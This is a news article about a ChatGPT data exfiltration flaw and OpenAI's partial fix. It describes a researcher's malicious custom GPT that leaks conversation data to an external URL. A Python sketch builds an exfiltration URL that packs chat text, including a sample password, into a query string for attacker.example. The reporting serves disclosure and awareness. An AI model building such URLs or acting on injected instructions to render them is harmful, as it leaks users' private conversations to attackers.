OpenAI rolls out imperfect fix for ChatGPT data leak flaw
OpenAI has mitigated a data exfiltration bug in ChatGPT that could leak conversation details to an external URL.
According to the researcher who discovered the flaw, the mitigation isn't perfect, so attackers can still exploit it under certain conditions.
Also, the safety checks have not yet been implemented in the ChatGPT iOS mobile app, so the risk on that platform remains unaddressed.
Data leak problem
Security researcher Johann Rehberger discovered a technique to exfiltrate data from ChatGPT and reported it to OpenAI in April 2023. In November 2023, he shared additional information on creating malicious GPTs that leverage the flaw to phish users.
"This GPT and underlying instructions were promptly reported to OpenAI on November, 13th 2023," the researcher wrote in his disclosure.
"However, the ticket was closed on November 15th as 'Not Applicable'. Two follow up inquiries remained unanswered. Hence it seems best to share this with the public to raise awareness."
GPTs are custom AI models marketed as "AI apps," specializing in various roles such as customer support, writing and translation assistance, data analysis, crafting cooking recipes from available ingredients, gathering research data, and even playing games.
Following the lack of response from the chatbot's vendor, the researcher publicly disclosed his findings on December 12, 2023, demonstrating a custom tic-tac-toe GPT named 'The Thief!' that can exfiltrate conversation data to an external URL operated by the researcher.
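Exfiltration tricks of this kind typically smuggle chat data out through a URL that the client is induced to fetch, with the stolen text packed into the query string. A minimal sketch of how such a payload could be built (the domain, parameter name, and function are illustrative, not taken from the researcher's actual proof of concept):

```python
from urllib.parse import quote


def build_exfil_url(conversation: str,
                    attacker_url: str = "https://attacker.example/log") -> str:
    """Pack conversation text into the query string of an attacker URL.

    If a chat client automatically fetches or renders this URL (for
    example as an inline image), the request itself delivers the data
    to the attacker's server, with no further user action needed.
    """
    # URL-encode the conversation so it survives as a single query value
    return f"{attacker_url}?q={quote(conversation)}"


payload = build_exfil_url("user said: my password is hunter2")
print(payload)
```

The key point the sketch illustrates is that no special channel is required: any mechanism that makes the client issue an HTTP GET to an attacker-controlled host is enough to leak whatever fits in a URL.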
Posted on: 12/26/2023 11:50:19 AM